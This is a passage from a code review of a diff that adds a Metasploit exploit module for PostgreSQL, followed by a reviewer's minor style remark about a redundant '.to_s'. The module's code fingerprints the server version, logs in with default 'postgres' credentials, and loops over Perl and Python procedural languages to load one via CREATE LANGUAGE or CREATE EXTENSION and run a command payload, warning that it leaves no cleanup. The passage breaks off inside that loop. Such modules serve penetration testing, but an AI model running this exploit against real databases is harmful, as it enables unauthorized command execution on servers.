modules/exploits/multi/postgres/postgres_createlang.rb

```diff
@@ -0,0 +1,274 @@
+
+        Only Postgres 8 and up are supported.
+      ),
+      'Author' => [
+        'Micheal Cottingham', # author of this module
+        'midnitesnake', # the postgres_payload module that this is based on
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
+        ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
+        ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
+      ],
+      'Platform' => %w(linux unix win osx),
+      'Payload' => {
+        'PayloadType' => %w(cmd)
+      },
+      'Arch' => [ARCH_CMD],
+      'Targets' => [
+        ['Automatic', {}]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jan 1 2016')
+      )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
+      OptString.new('PASSWORD', [true, 'The password to the service', 'postgres'])
+    ], self.class)
+
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+  end
+
+  def check
+    version = postgres_fingerprint
+
+    if version[:auth]
+      version_match = version[:auth].match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+      major_version = version_match['major_version']
+
+      if major_version.to_i >= 8
+        return CheckCode::Appears
+
+      else
+        print_error 'Unsupported version'
+        return CheckCode::Safe
+      end
+
+    else
+      print_error "Authentication failed. #{version[:preauth] || version[:unknown]}"
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+    version = do_login(username, password, database)
+
+    case version
+    when :noauth
+      print_error 'Authentication failed.'
+      return
+
+    when :noconn
+      print_error 'Connection failed.'
+      return
+
+    else
+      print_status "#{rhost}:#{rport} - #{version}"
+    end
+
+    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+    major_version = version_match['major_version']
+    extension = 'LANGUAGE'
+
+    if major_version.to_i == 8
+      print_status 'Selecting version 8 payload'
+      extension = 'LANGUAGE'
+
+    elsif major_version.to_i >= 9
+      print_status 'Selecting version 9 payload'
+      extension = 'EXTENSION'
+
+    else
+      print_error 'Unsupported version - exploit failed'
+      return false
+    end
+
+    print_warning 'This exploit does not clean up after itself - you will need to do that manually'
+
+    # Attack!
+    begin
+      func_name = Rex::Text.rand_text_alpha(10)
+
+      languages = %w(perl python python2 python3)
+      loaded = false
+
+      languages.each do |language|
+        load_lang = create_language(language, extension)
+        human_language = language.capitalize.to_s
```

Comment:
Minor, but the `.to_s` is unecessary given that `language` and the result of `capitalize` is already a string.